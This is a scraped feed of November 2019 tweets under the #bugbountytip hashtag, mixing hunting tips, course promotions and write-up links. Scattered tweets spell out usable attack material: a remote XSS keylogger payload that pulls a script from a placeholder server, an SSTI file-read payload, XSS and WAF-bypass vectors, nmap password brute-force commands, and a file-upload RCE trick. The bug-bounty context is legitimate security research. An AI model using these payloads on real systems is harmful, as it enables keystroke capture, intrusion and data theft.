0 After seeing *.domain.com ...Recon Script Pop-ups 😛😂 #BadBugBountyPickUpLines #bugbountytip
Yadhavi
@PrincessYadhavi


2019-11-20 16:57:27
0 As Defcon 27 videos uploaded to youtube, which talks are must watch for bug bounty hunters? #defcon #bugbounty #bugbountytip #bugbountytips
Ali Tütüncü
@alicanact60


2019-11-20 16:27:34
0 Hi there! I will share a vulnerability which I found on Facebook. PoC video or Write up? Which one do you prefer? The survey will be available for 2 days and then, I will publish it. Select one! #BugBounty #bugbountytips #bugbountytip
Daher Mohamed
@DaherMohamed4


2019-11-20 15:37:46
0 My first BB Write Up : How I paid 2$ for a +1000$ XSS https://t.co/uv11CIACuA #BugBounty #bugbountytips #bugbountytip
RIPS Technologies
@ripstech


2019-11-20 15:36:25
2 Find out how Simon found 5 #WordPress core 0days, in our #security whitepaper: ->https://t.co/U7VCsBglqR #bugbounty #bugbountytip #bugbountytips #AppSec https://t.co/fNU3DID063
€𝔵𝔭𝔩𝔬𝔦𝔱𝔠0𝔡𝔢𝔯
@vanshitmalhotra


2019-11-20 13:18:12
0 Get Cyber Security and Technology Internship with HACKDOOR Follow Us 💰💰 https://t.co/iNczOcGmCt Subscribe to YouTube Channel for Free Tutorials https://t.co/42lWP1DIW0 #BugBounty #BugBountyTip #bugbountytips #penetrationtesting #pentesting #devops #devsecops #cybersecurity https://t.co/KskyHzVwvW
€𝔵𝔭𝔩𝔬𝔦𝔱𝔠0𝔡𝔢𝔯
@vanshitmalhotra


2019-11-20 13:10:22
0 Follow Us 💰💰 https://t.co/iNczOcGmCt Subscribe to YouTube Channel for Free Tutorials https://t.co/42lWP1DIW0 #BugBounty #BugBountyTip #bugbountytips #penetrationtesting #pentesting #devops #devsecops #cybersecurity #hackerone https://t.co/u2LdRIokeL
€𝔵𝔭𝔩𝔬𝔦𝔱𝔠0𝔡𝔢𝔯
@vanshitmalhotra


2019-11-20 13:08:49
0 Follow Us 💰💰 https://t.co/iNczOcGmCt Subscribe to YouTube Channel for Free Tutorials https://t.co/42lWP1DIW0 #BugBounty #BugBountyTip #bugbountytips #penetrationtesting #pentesting #devops #devsecops #cybersecurity #hackerone https://t.co/Bh0bARIGBh
€𝔵𝔭𝔩𝔬𝔦𝔱𝔠0𝔡𝔢𝔯
@vanshitmalhotra


2019-11-20 13:06:58
1 Follow Us 💰💰 https://t.co/iNczOcGmCt Subscribe to YouTube Channel for Free Tutorials https://t.co/42lWP1DIW0 #BugBounty #BugBountyTip #bugbountytips #penetrationtesting #pentesting #devops #devsecops #cybersecurity #hackerone https://t.co/mCZqeZB8YT
National Cyber Security Services
@NationalCyberS1


2019-11-20 12:40:53
2 Configuring Frida with #BurpSuite and #Genymotion to #bypass #Android #SSL Pinning #LINK :- https://t.co/jLWK2f7dx6 #cybersecurity #Pentesting #pentest #hacking #bugbountytips #bugbounty #bugbountytip https://t.co/JIZt1QUzHi
x1m
@x1m_martijn


2019-11-20 09:23:49
0 Someone else is using my xsshunter payload :p I don't mind heheheh #bugbountytip
Vikash Chaudhary
@OffensiveHunter


2019-11-20 03:49:31
2 #BugBountyTip if you are not getting bounty then hunt these bugs on any program first , you will surely get. it's very easy to hunt these bugs. Regards! #Vikash #Chaudhary CEO & Founder (#HackersEra #Cyber #Security #Consultancy & #Training PVT LTD) mail…https://t.co/NHBnVkBMWH
YogoshaOfficial
@YogoshaOfficial


2019-11-19 16:08:30
10 [#bugbountytip]: If you're blocked by WAF during your pentest, try to hide your IP by forcing the proxy to remove all possible headers by using hop-by-hop headers Exp: Connection: close, X-Originating-IP, X-Forwarded-For, X-Remote-IP, X-Remote-Addr @TnMch_
Mantis
@MantisSTS


2019-11-19 15:07:52
2 What word lists do you have most success with to find admin panels? RT for reach! #BugBounty #bugbountytip
€𝔵𝔭𝔩𝔬𝔦𝔱𝔠0𝔡𝔢𝔯
@vanshitmalhotra


2019-11-19 14:11:17
2 Maximise Bug Bounty Scope - Gather Subdomains using Facebook Certificate Transparency Follow Us 💰💰💰💰 https://t.co/iNczOcGmCt Subscribe to YouTube Channel for Free Tutorials https://t.co/42lWP1DIW0 #BugBounty #BugBountyTip #bugbountytips #pentesting https://t.co/AjSRBqt57p
€𝔵𝔭𝔩𝔬𝔦𝔱𝔠0𝔡𝔢𝔯
@vanshitmalhotra


2019-11-19 14:00:03
3 Cross Site Scripting Basics - OWASP Juice Shop Tutorial OWASP Top Ten Follow Us 💰💰💰💰 https://t.co/iNczOcGmCt Subscribe to YouTube Channel for Free Tutorials https://t.co/42lWP1DIW0 #BugBounty #BugBountyTip #bugbountytips #penetrationtesting #Pentesting https://t.co/0wdvBhdOHw
bugbountytip
@a_l_e_r_t_1_


2019-11-19 11:16:24
1 Stored XSS on gitlab - 2 #bugbountytips #bugbountytip https://t.co/eaW3avmcpK
Raad Haddad
@raadfhaddad


2019-11-19 07:17:36
2 Read headlines of the company's policies, make sure they implement it correctly, especially when it comes to insecure data storage. I found something related to this in Facebook last year! And yes, I got rewarded for my finding. #bugbountytip #bugbounty #security
_ABDOUL_GAFFHAR_
@mrgaphy


2019-11-19 06:21:42
0 For my next open source project I want to make an automated tool that will search for leaked credentials in log and config files. I always seem to find exposed credentials in log or configuration files. #bugbountytips #BugBounty #bugbountytip #osint #pentest #webappsec #redteam #infosec
void
@gowridash


2019-11-19 04:57:35
0 @facebook Still Notification #bug #defect is not fixed? During shifting Mobile data/Wi-Fi already read/seen posts are showing as new ones #Android9 Is it so difficult to fix this #issue #bugbountytip
tololovejoi
@tolo7010


2019-11-18 23:01:07
0 1% of new bug bounty hunters ask for knowledge, 99% of them ask for motivation #bugbounty #bugbountytip #infosec #hacking
გოჩა ოქრაძე (Gocha Okradze)
@GochaOqradze


2019-11-18 22:35:10
0 #bugbountytip #bugbountytios All bug hunters write "try to understand the web app" and write some payloads :) But no one writes about detection methodology :) Try to understand every vuln and what you need to search for in the response body after sending the payload.
Bogdan Tcaciuc
@bogdantcaciuc7


2019-11-18 22:14:56
1 Remember that *pht* files can be used to execute PHP code. Old #bugbountytip
m0z
@LooseSecurity


2019-11-18 18:41:49
6 I once exploited SSTI in flask app with payload: {{ config.items()[4][1].__class__.__mro__[2].__subclasses__()[40](\"/tmp/flag\").read() }} If you find SSTI, you NEED to show how to exploit! Reading files is perfect. #bugbountytips #BugBounty #bugbountytip payload not by me
€𝔵𝔭𝔩𝔬𝔦𝔱𝔠0𝔡𝔢𝔯
@vanshitmalhotra


2019-11-18 18:07:09
0 [Tutorial] My Tutorial collection for SHELLING+ROOTING WEBSITES ----- COMMENT HERE and will share the link ! Follow Us 💰💰💰💰 https://t.co/iNczOcGmCt Subscribe to YouTube Channel for Free Tutorials https://t.co/42lWP1DIW0 #BugBounty #BugBountyTip #bugbountytips
€𝔵𝔭𝔩𝔬𝔦𝔱𝔠0𝔡𝔢𝔯
@vanshitmalhotra


2019-11-18 17:56:50
0 Hacking Windows PC using Metasploit u TORRENT Tutorial by Hackdoor on WebDav_dll Hijacking https://t.co/yznzTvdCrC Follow Us 💰💰💰💰 https://t.co/iNczOcGmCt Subscribe to YouTube Channel for Free Tutorials https://t.co/42lWP1DIW0 #BugBounty #BugBountyTip #bugbountytips https://t.co/OT1MPRtl86
€𝔵𝔭𝔩𝔬𝔦𝔱𝔠0𝔡𝔢𝔯
@vanshitmalhotra


2019-11-18 17:40:28
1 [[[FREE]]] Biggest Repository of Ebooks (hacking, penetration testing, tool , programming and more) ! Comment Here and I will share the Link with you -- Limited Users only !! #BugBounty #BugBountyTip #bugbountytips #penetrationtesting #pentesting #devops #devsecops
Halil AHMAD
@Halilahmadd


2019-11-18 11:33:37
0 Second Time Hall Of Fame #BugBounty #XSS #BugBountyTip #infosec https://t.co/Q0WGIKRgpt
HamdiSevben
@HmdSvbn


2019-11-18 11:08:14
0 -1-A penetration tester’s guide to sub-domain enumeration.pdf: https://t.co/fhokFhyIyj -2-Comprehensive Guide on Metasploitable 2.pdf: https://t.co/C56oHA2Aua -3-Android Apk reverse engineering using Apktool and Frida.pdf: https://t.co/RmE8h4eP6R #bugbountytip #Hacking #redteam
Ali Tütüncü
@alicanact60


2019-11-18 10:34:55
2 Last night, worked about 1 hour and got one triaged report. Waiting for payment. @Hacker0x01 #BugBounty #bugbountyips #bugbountytip 1. Always look at all requests. Maybe you can find a redirect parameter. 2. This payload can be useful for open redirects: //[email protected] https://t.co/VsUp6O1vCt
Ammar Amer🇸🇾
@cry__pto


2019-11-18 09:54:28
5 -1-A penetration tester’s guide to sub-domain enumeration.pdf: https://t.co/OOd6Z3Qc1M -2-Comprehensive Guide on Metasploitable 2.pdf: https://t.co/HoinO16IyM -3-Android Apk reverse engineering using Apktool and Frida.pdf: https://t.co/Lz7WTH1mzY #bugbountytip #Hacking #redteam
OCK le Fécond
@OscLFecond


2019-11-18 07:36:58
1 How to Bypass SSL Pinning on Android: -Root your device -Install your mitm cert -Move it from data/misc/user/0/cacerts-added -To /system/etc/security/cacerts -No need for Frida - Enjoy <3 #AndroidSecurity #MobileSecurity #bugbountytip #bugbountytips
Shantanu Kulkarni
@Iamshantanukul


2019-11-18 05:51:21
0 If a failed login causes the application to send a warning email to the user, any user data incorporated into the email may need to be checked for SMTP injection attacks. #bugbountytip #hackerone #bugcrowd #bughunting #bugbounty #pentesting #hacking #cybersecurity #bugbountytips
darkmage
@therealdarkmage


2019-11-18 05:35:52
0 Aw fooey, my most recent submission to @Bugcrowd was marked as "duplicate"...meaning it was still a legit concern! Heck yeah, I am learning and leveling up! - It was an open redirect on a website where I overcame a whitelist using a double-redirect 😎 #bugbounty #bugbountytip
Imran nissar
@Imrannissar3


2019-11-18 05:18:49
4 How bash can be used for automation #bugbounty #bugbountytip https://t.co/heUev6rsuI
m0z
@LooseSecurity


2019-11-17 20:46:27
0 Always remember to test for SSTI (Server-Side Template Injection). Test for it the same way you would for XSS. A few simple payloads like {{7*7}} and if they get replaced by '49' then you've just found a high/critical vulnerability. You need to get a PoC though! #bugbountytip
Halil AHMAD
@Halilahmadd


2019-11-17 20:16:17
5 REMOTE XSS KEYLOGGER Payload: <svg/onload=setTimeout(function(){d=document;z=d.createElement("script");z.src="//YOUR_SERVER/keylogger.js";d.body.appendChild(z)},0)> #BugBounty #XSS #BugBountyTip #infosec #Bypass #Hackerone #Firewall #Security
ghostlulz
@ghostlulz1337


2019-11-17 18:37:46
7 I always seem to find exposed credentials in log or configuration files. These are easy wins that take 10 seconds to find. More info on my blog: https://t.co/Kft6p37wJM #bugbountytips #BugBounty #bugbountytip #osint #pentest #appsec #redteam #infosec #pentesting #logs #config https://t.co/Vf4AJs2sn7
A hacker's life
@Unknownuser1806


2019-11-17 12:12:55
0 STEALING $10,000 YAHOO COOKIES! https://t.co/PSImiH4oNc JUMPING TO THE HELL WITH 10 ATTEMPTS TO BYPASS DEVIL’S WAF: https://t.co/IpzdET7XVb #bugbounty,#bugbountytip,#cybersecurity,#hacking,#infosec
bugbountytip
@a_l_e_r_t_1_


2019-11-17 10:30:09
2 Less than 1$... Learn & Hack & Earn https://t.co/fR7SA5JafD #BugBountyTip #xss #xxe #sqli #ssrf #rce #bughunting #bughunters #hackerone #bugcrowd #ruby #python #idor https://t.co/AaUIgsgeiM
sagar yadav
@sagaryadav8742


2019-11-17 04:01:58
0 Fun time with @stokfredrik ✌️ and @sechunt3r 😁in #bsidesahmedabad #bugbountytip #bugbounty #bughunting #bugcrowd #cobalt #nullcon #hackerone #Intel #BountyHunter #bounty #secure #zerocopter #happy #sagaryadav8742 https://t.co/vzkOVrKygS
Bogdan Tcaciuc
@bogdantcaciuc7


2019-11-17 02:38:05
0 #bugbountytip Always try to access the localStorage when you get an XSS vulnerability. Just managed to retrieve the JWT tokens and user PII information stored on localStorage.
Gillis Jones
@Gillis57


2019-11-17 00:29:13
0 #bugbountytip If you're using a shared environment, and see someone else's injections are messing up the environment for other testers - take the 5 minutes necessary to try to clean up after the other testers that don't respect you enough to do the same.
Ammar Amer🇸🇾
@cry__pto


2019-11-16 23:00:56
6 -1-Recon Everything.pdf: https://t.co/mRJV7fnMQg -2-Open Source Web Reconnaissance with Recon-ng.pdf: https://t.co/V1mV1NNzTB -3-12 OSINT Resources For E-mail Addresses.pdf: https://t.co/EgR3LoHoAm -4-OSINT.pdf: https://t.co/wDNvAWXATu #OSINT #bugbountytip #redteam #Pentesting
tololovejoi
@tolo7010


2019-11-16 20:55:10
3 Bug bounty is not possible if there are no publicly disclosed reports at @Hacker0x01 #bugbounty #bugbountytip #infosec #hacking
healthyoutlet
@healthyoutlet


2019-11-16 19:27:50
0 If you're writing cli tools that people will be using in bash, consider sending all your banners and verbose output to stderr so that the main output can be cleanly piped into other tools. In python you can use sys.stderr.write() #bugbountytip
swordfish
@swordfi96641916


2019-11-16 19:05:46
0 Response: Cannot GET / .. tried all the HTTP Request headers. Any tips on what's next? #bugbounty #bugbountytip
bugbountytip
@a_l_e_r_t_1_


2019-11-16 18:41:28
0 site:"https://t.co/XdC6eMbugO" pdf -- High level information disclosure !!! User's phone numbers, addresses .... #bugbountytips #bugbountytip https://t.co/7qG4z5s7CZ
bugbountytip
@a_l_e_r_t_1_


2019-11-16 18:37:12
1 Less than 1$...(Just a little bit earning for my master degree).. Learn & Hack & Earn https://t.co/fR7SA5JafD #BugBountyTip #xss #xxe #sqli #ssrf #rce #bughunting #bughunters #hackerone #bugcrowd #ruby #python #idor https://t.co/Dq4zebkM4o
Berk Bulan
@berk_bulan


2019-11-16 14:56:09
0 Dns Zone Transfer script #BugBounty #bugbountytip #bugbountytips https://t.co/aKUoARVYQ7
€𝔵𝔭𝔩𝔬𝔦𝔱𝔠0𝔡𝔢𝔯
@vanshitmalhotra


2019-11-16 14:32:21
0 Follow Us 💰💰 https://t.co/iNczOcGmCt Subscribe to YouTube Channel for Free Tutorials https://t.co/42lWP1DIW0 #BugBounty #BugBountyTip #bugbountytips #penetrationtesting #pentesting #devops #devsecops #cybersecurity #hackerone https://t.co/nbOwGUl1dF
Hussein Daher
@HusseiN98D


2019-11-16 12:42:59
9 To everyone who has been following me, you know I was taking a #bugbounty challenge: 30days $30k Started 20/10. Some bugs still unpaid. I've failed. Still 4 more days to go to complete but I'll be stopping here, I feel really tired. #bugbountytip #bugbountytips #infosec #pentest https://t.co/VRoYeMrxuo
Elsadat
@M0_SADAT


2019-11-16 10:57:28
0 Read THE JS FILES #bugbountytip
Zero Xyele
@zeroxyele


2019-11-16 08:19:05
3 Simple Python Script for Host Header Redirection Attack [Multithreaded] https://t.co/LIHgGibs5Z I was awarded 150$ in ten minutes by using that tool 😎 #bugbounty #bugbountytip #bugbountytips #hackerone #hacker101
evryd4y
@evryd4y


2019-11-16 05:56:12
1 Handy for passive enum https://t.co/G8fYKfqLTG #bugbountytip
Ashish Kunwar
@D0rkerDevil


2019-11-16 02:07:43
0 @TakSec Param miner extension can find this. :) #bugbountytip
Gillis Jones
@Gillis57


2019-11-15 23:40:15
0 #bugbountytip If you're using a shared environment with other testers. The rules are very similar to hiking. #leavenotrace- leave the environment like you found it. If you leave damn injections all over the place rendering it unusable, you're an asshole.
Hussein Daher
@HusseiN98D


2019-11-15 20:43:37
2 So today I've found an SQLi in a cookie. Many people only stick to parameters. Test cookies too! #bugbounty #bugbountytips #bugbountytip
Sagar Tanur
@Sagarvd01


2019-11-15 15:50:12
1 Here's a write up of how I could've accessed sensitive PII and private data of tens of thousands of Indians. https://t.co/uby8wggKPx #bugbounty #bugbountytips #BugBountyTip #hacking #infosec #writeup
Halil AHMAD
@Halilahmadd


2019-11-15 15:33:54
0 XSS on a login page while stuck in an input tag with <> filtered. Final Payload: " formaction=java%26Tab%3bscript:ale%26Tab%3brt() type=image src="" #BugBounty #XSS #BugBountyTip #infosec #Bypass #Hackerone #Firewall #Security
bugbountytip
@a_l_e_r_t_1_


2019-11-15 13:55:48
1 Less than 1$... More than 5000 line. Everywhere... You dont need internet. Constantly updating... Learn & Hack & Earn https://t.co/fR7SA5JafD #bugbountytip #xss #xxe #sqli #ssrf #rce #bughunting #bughunters #hackerone #bugcrowd #ruby #python #idor #bugbountytips https://t.co/np0PsJg3GY
Ammar Amer🇸🇾
@cry__pto


2019-11-15 12:38:47
8 -Brute forcing MySQL passwords: nmap -p3306 --script mysql-brute xx.xx.xx.xx -Brute forcing MS SQL passwords: nmap -p1433 --script ms-sql-brute xx.xx.xx.xx -Brute forcing Redis passwords: nmap -p6379 --script redis-brute xx.xx.xx.xx #nmap #hacking #Pentesting #BugBountyTip
Pascal S
@PascalSec


2019-11-15 12:22:39
0 [1/2] #BugBountyTip So this is a pretty basic one but I happen to forget about it over and over again. Before starting a new pentest engagement, clear all your cookies and browser cache. Happened to me many times before that I was asking myself what a specific cookie was for...
Ammar Amer🇸🇾
@cry__pto


2019-11-15 11:51:49
6 -XSS cheat sheet portswigge.pdf: https://t.co/lSCq9VHoYF -XSS via HTTP Headers.pdf: https://t.co/jiQJnioGwt -SQL Injection & XSS Playground.pdf: https://t.co/9QZCtkFcx7 -XSS Exploitation in DVWA (Bypass All Security).pdf: https://t.co/dzwO0TwHCF #bugbountytip #xss #Hacking
Elsadat
@M0_SADAT


2019-11-15 10:18:09
2 Finally✌️Acknowledged by @BMW Security Team for 2019 after finding bug in the main domain ;) #bugbountytip ? 1-There is something left for you 2-Always try to Escalate everything you find! 3-NEVER GIVE UP HOF Link:https://t.co/RdsatALn39 (Ahmed Elsadat) #HOF #BugBounty #infosec https://t.co/otgetMsWC0
bugbountytip
@a_l_e_r_t_1_


2019-11-15 08:51:29
1 Less than 1$... More than 5000 line. Everywhere... You dont need internet. Constantly updating... Learn & Hack & Earn https://t.co/fR7SA5JafD #BugBountyTip #xss #xxe #sqli #ssrf #rce #bughunting #bughunters #hackerone #bugcrowd #ruby #python #idor https://t.co/e5k6XeQeK2
Ammar Amer🇸🇾
@cry__pto


2019-11-15 02:35:29
7 -Top GitHub Dorks and Tools Used to Scan GitHub Repositories for Sensitive Data.pdf: https://t.co/hM7HIZM56f -Pentesting Cheatsheet.pdf: https://t.co/tGxEQsqiQO -Windows Userland Persistence Fundamentals.pdf: https://t.co/uB0pSeXDP3 #PenTest #OSINT #bugbountytip #Hacking #infosec
Ammar Amer🇸🇾
@cry__pto


2019-11-14 23:24:33
4 -XSS cheat sheet portswigge.pdf: https://t.co/lSCq9VHoYF -Top GitHub Dorks and Tools: https://t.co/hM7HIZM56f -Pentesting Cheatsheet: https://t.co/zFwYAhCAba -Pentesting Cheatsheet2.pdf: https://t.co/34YEhESX58 -Pentesting Cheatsheets.pdf: https://t.co/tGxEQsqiQO #BugBountyTip
Sagar Tanur
@Sagarvd01


2019-11-14 17:02:57
0 A write up on how I was able to take over 4 tabs in Facebook's own Facebook pages. https://t.co/gmwro4xl5T #bugbounty #bugbountytips #BugBountyTip #writeup @Hacker0x01 @Bugcrowd
yourXss
@yourXss


2019-11-14 16:20:00
0 RT @HusseiN98D: TimeForA #BugBountyTip I use https://t.co/2deV884VM2 to find defaced (sub) domains of the website I am testing. This reveal…
YogoshaOfficial
@YogoshaOfficial


2019-11-14 13:33:08
7 [#Bugbountytip] ExpressJs runs on port 3000 , and if debug is on, then a lot of information can be disclosed exp : http[s]://example.com:3000/debug/pprof/heap?debug=1 Thanks @D0rkerDevil for this great tip ! Feel free to send us more #hackertips to share with the community
Ankit Thakur @bsidesahmedabad
@rudra16t


2019-11-14 09:00:01
1 Yeah looking forward to see you all at @bsidesahmedabad #bsidesahmedabad #infosec #bugbounty #BugBountyTip https://t.co/5HTiT8AQF2
Wh11teW0lf
@Wh11teW0lf


2019-11-14 06:54:48
0 #BugBountyTip Yesterday i found disclosure of AWS keys via /AWSconf.git/ folder instead of /.git/ folder
tololovejoi
@tolo7010


2019-11-14 06:42:39
0 Hacking doesn't take some time, it takes forever. #bugbounty #bugbountytip #bugbountytips #hacking
Evan Custodio
@defparam


2019-11-14 04:53:14
0 Gotta take breaks from hacking clear your mind. Stayed away from the computer last weekend and spent all Saturday plumbing in this sleek softener system with my buddy. Started recon again and filed 2 High/Crit HTTP Request Smuggling bugs today. Stay rested y’all #BugBountyTip https://t.co/8GeWvj0YO9
.̶́͒̈́̔̈́͐̐̿̈́̏̏̀̈̒̇̉̽ Halil AHMAD .̶́͒̈́̔̈́͐̐̿̈́̏̏̀̈
@Halilahmadd


2019-11-14 04:37:17
3 CloudFlare XSS Bypass Payload: <a"/onclick=(confirm)()>Click Here! #BugBounty #XSS #BugBountyTip #infosec #Bypass #Hackerone #Firewall #Security
bugbountytip
@a_l_e_r_t_1_


2019-11-13 23:51:28
0 Now again less than 1$ !!! (short time) (Just a little bit earning for my master degree).. Learn & Hack & Earn https://t.co/fR7SA5JafD #BugBountyTip #xss #xxe #sqli #ssrf #rce #bughunting #bughunters #hackerone #bugcrowd #ruby #python #idor https://t.co/3eMttPxf6k
Alex Birsan
@alxbrsn


2019-11-13 20:21:12
0 #bugbountytip: Give some non-platform programs a try! No stats to worry about, no drama, no superfluous processes. Just you and the scope. https://t.co/dJRxMEekdO
Mourad
@SecuAudit


2019-11-13 17:51:56
0 Terrible Experience - Unfortunately with asian gaming companies at @Hacker0x01 programs , mostly they even don't answer msgs ... really not a very good experience . #bugbounty #BugBountyTip
Gwendal Le Coguic
@gwendallecoguic


2019-11-13 16:51:45
1 One-liner to resolve the host of a given URL #bugbountytip #tools #onliner host `echo $url|sed "s/.*:\/\///"|cut -d '/' -f 1|cut -d '@' -f 2|cut -d':' -f 1` https://t.co/DYokxgu5B4 https://t.co/ZnkGnGvBsy
yourXss
@yourXss


2019-11-13 16:00:00
3 TimeForA #BugBountyTip I use https://t.co/2deV884VM2 to find defaced (sub) domains of the website I am testing. This reveals subdomains, potentially defaced /dir/ (if not index). I pursue testing using the data I got. #bugbounty #bugbountytips #pentest #infosec Get CREATIVE RT👁️
Hussein Daher
@HusseiN98D


2019-11-13 15:58:28
3 TimeForA #BugBountyTip I use https://t.co/TKsmKBnl8M to find defaced (sub) domains of the website I am testing. This reveals subdomains, potentially defaced /dir/ (if not index). I pursue testing using the data I got. #bugbounty #bugbountytips #pentest #infosec Get CREATIVE RT👁️
Noman | نعمان | नोमान
@nomanAli181


2019-11-13 15:56:14
0 Took hours to turn this from 'possible' SQL Injection to finally exploit it coz It was Blind + webserver was blocking a bunch of chars. Learn SQL syntax coz sqlmap won't help/work in all cases ;) #bugbounty #bugbountytip https://t.co/B29DV9d0Bw
HackIsOn ®
@hackison


2019-11-13 14:36:43
0 Credits: @erbbysam #bugbounty #bugbountytips #BugBountyTip https://t.co/zqGpyjfaWp
Ammar Amer🇸🇾
@cry__pto


2019-11-12 19:30:18
6 -Getting Started in BugBounty Hunting.pdf https://t.co/ZSTyAcvGQx -OSCP-Survival-Guide.pdf: https://t.co/bmTXPteO6m -TLS&SSL Penetration Testing.pdf: https://t.co/HsFlycdTAc -Evil Twin Attack:The Definitive Guide.pdf: https://t.co/IjzR0QaAJp #bugbountytip #hacking #Pentest #OSCP
bugbountytip
@a_l_e_r_t_1_


2019-11-12 18:50:47
1 Now less than 1$ (Just a little bit earning for my master degree).. Learn & Hack & Earn https://t.co/fR7SA5JafD #BugBountyTip #xss #xxe #sqli #ssrf #rce #bughunting #bughunters #hackerone #bugcrowd #ruby #python #idor
Hussein Daher
@HusseiN98D


2019-11-12 17:20:38
22 Time for another #BugBountyTip : While testing file upload forms on IIS7 servers, you can get RCE by uploading ".cer" files if ".asp" extension is blacklisted. This already led me to multiple RCEs in #bugbounty and #pentest projects. #bugbountytips RT if you love! More coming 👁️
.̶́͒̈́̔̈́͐̐̿̈́̏̏̀̈̒̇̉̽ Halil AHMAD .̶́͒̈́̔̈́͐̐̿̈́̏̏̀̈
@Halilahmadd


2019-11-12 13:42:22
2 Here is a nice Bootstrap vector that has recently been added to the XSS cheat sheet by <xss class=progress-bar-animated onanimationstart=alert(1)> #BugBounty #XSS #BugBountyTip #infosec #Bypass #Hackerone #Firewall #Security
Yadhavi
@PrincessYadhavi


2019-11-12 12:37:25
0 somewhere i heard about a tool which can grep through burp saved files(sitemap -> right click,-> save selected items). i forgot the name. anyone know about? #bugbounty #bugbountytips #bugbountytip #burpsuite
Hussein Daher
@HusseiN98D


2019-11-12 11:17:30
4 CHEAP VPS UBUNTU SERVERS: I receive many messages asking where to get a cheap/good VPS for #bugbounty You can have a good server for as low as $2/month month by using my 50% discount code D98KTCA15Y on https://t.co/xl74Mwv0PB ! BTC payment supported #bugbountytips #bugbountytip
0day work
@0daywork


2019-11-12 00:57:50
0 #BugBountyTip Always check for #RaceConditions when redeeming coupons to get greater discounts and huge bounties ;-) #Bugbounty #OWASP #ITSecurity https://t.co/k3ZlbRmVBO
stoXe
@DevinStokes


2019-11-11 23:09:16
6 Remote XSS Keylogger: Payload: <svg/onload=setTimeout(function(){d=document;z=d.createElement("script");z.src="//YOUR_SERVER/keylogger.js";d.body.appendChild(z)},0)> This will log a user's input to your remote server. #BugBounty #BugBountyTip #XSS https://t.co/WvH30bUbyF
m0z
@LooseSecurity


2019-11-11 20:48:29
1 League of Bounties: Almost 600 members and growing! Ask your #BugBounty questions and get #bugbountytips from the top bug bounty hunters and whitehat hackers in the community. #BugBountyTip Joining our discord increases bug bounty luck by 15%. https://t.co/WTsdy7VJXI
Mourad
@SecuAudit


2019-11-11 20:22:33
0 i've accumulated more than 10 reports closed as informative this week , time to take a break relax and evaluate my pentesting approach #bugbountytips #BugBountyTip https://t.co/nnJ3KLJVYr
€𝔵𝔭𝔩𝔬𝔦𝔱𝔠0𝔡𝔢𝔯
@vanshitmalhotra


2019-11-11 18:36:40
0 Get Hall of Fame and Bug Bounty With Hackdoor Trainings Follow Us 💰💰 https://t.co/iNczOcGmCt Subscribe to YouTube Channel for Free Tutorials https://t.co/42lWP1DIW0 #BugBounty #BugBountyTip #bugbountytips #penetrationtesting #pentesting #devops #devsecops #cybersecurity https://t.co/ITiMzEy1ED
€𝔵𝔭𝔩𝔬𝔦𝔱𝔠0𝔡𝔢𝔯
@vanshitmalhotra


2019-11-11 18:29:34
3 Follow Us 💰💰 https://t.co/iNczOcGmCt Subscribe to YouTube Channel for Free Tutorials https://t.co/42lWP1DIW0 #BugBounty #BugBountyTip #bugbountytips #penetrationtesting #pentesting #devops #devsecops #cybersecurity #hackerone https://t.co/uNTTXRVKRA
€𝔵𝔭𝔩𝔬𝔦𝔱𝔠0𝔡𝔢𝔯
@vanshitmalhotra


2019-11-11 18:28:36
0 Malware Alert !!! Follow Us 💰💰 https://t.co/iNczOcGmCt Subscribe to YouTube Channel for Free Tutorials https://t.co/42lWP1DIW0 #BugBounty #BugBountyTip #bugbountytips #penetrationtesting #pentesting #devops #devsecops #cybersecurity #hackerone https://t.co/jGlhtpTFpR
.̶́͒̈́̔̈́͐̐̿̈́̏̏̀̈̒̇̉̽ Halil AHMAD .̶́͒̈́̔̈́͐̐̿̈́̏̏̀̈
@Halilahmadd


2019-11-11 15:23:23
2 Here I want to share with you this magnificent. > Application bypass < <%0crameset%20src=''> #BugBounty #XSS #BugBountyTip #infosec #Bypass #Hackerone #Firewall #Security https://t.co/nN7haNHr97
ALL ABOUT HACKER
@AboutHacking


2019-11-11 13:38:35
3 Understanding HTTP Headers and cookie. Read: https://t.co/ZcHq5v6Ri8 #cybersecurity #cybersec #bugbounty #BugBountyTip #bugbountytips https://t.co/W0zQT2sn9D
intigriti
@intigriti


2019-11-11 12:46:04
6 [email protected]'s #BugBountyTip: Check JSON responses for additional properties, and send them back! 👀#HackWithIntigriti https://t.co/qIwEXtV9S8
Henry Chen
@chybeta


2019-11-11 10:54:10
0 Apache Flink Dashboard -> upload a malicious JAR -> submit new job -> getshell #bugbounty #bugbountytips #BugBountyTip https://t.co/lWNNCXHvvt
bugbountytip
@a_l_e_r_t_1_


2019-11-11 10:11:42
1 (Just a little bit earning for my master degree).. Learn & Hack & Earn https://t.co/fR7SA5JafD #BugBountyTip #xss #xxe #sqli #ssrf #rce #bughunting #bughunters #hackerone #bugcrowd #ruby #python #idor https://t.co/AoovNBqGht
Brodie Codie
@brodie_codie


2019-11-10 22:45:20
0 Tip 1. Passive, Active scanning and enumeration Probe the target Gather as much information about the target as possible Short List of Tools i like (Amass, Assetfinder, Pdlist, Dnsrecon, Dig, Wafw00f, Masscan, Dirsearch ) What tools do you like? #bugbountytips #BugBountyTip
ghostlulz
@ghostlulz1337


2019-11-10 22:15:04
8 You have probably heard of Subdomain Hijacking (takeover), but what about Broken Link Hijacking? You can utilize this vulnerability to get some easy Stored XSS wins. More info on my blog: https://t.co/Up6LfsdBs7 #bugbounty #bugbountytip #bugbountytips #infosec #redteam #pentest #xss https://t.co/uKA4V3uOZZ
.̶́͒̈́̔̈́͐̐̿̈́̏̏̀̈̒̇̉̽ Halil AHMAD .̶́͒̈́̔̈́͐̐̿̈́̏̏̀̈
@Halilahmadd


2019-11-10 21:56:46
0 Bypass is required if you need to use quotes in some encodings where single and double quotes are blocked <IMG SRC=`javascript:alert(“Halil?, ‘XSS’”)`> #BugBounty #XSS #BugBountyTip #infosec #Bypass
.̶́͒̈́̔̈́͐̐̿̈́̏̏̀̈̒̇̉̽ Halil AHMAD .̶́͒̈́̔̈́͐̐̿̈́̏̏̀̈
@Halilahmadd


2019-11-10 21:55:46
0 Let's say they blocked the site with nail. What will we do? Here is the solution: <IMG SRC=javascript:alert("XSS")> #BugBounty #XSS #BugBountyTip #infosec #Bypass
bugbountytip
@a_l_e_r_t_1_


2019-11-10 21:03:44
1 (Just a little bit earning for my master degree).. Learn & Hack & Earn https://t.co/fR7SA5JafD #BugBountyTip #xss #xxe #sqli #ssrf #rce #bughunting #bughunters #hackerone #bugcrowd #ruby #python #idor
0day work
@0daywork


2019-11-10 20:47:57
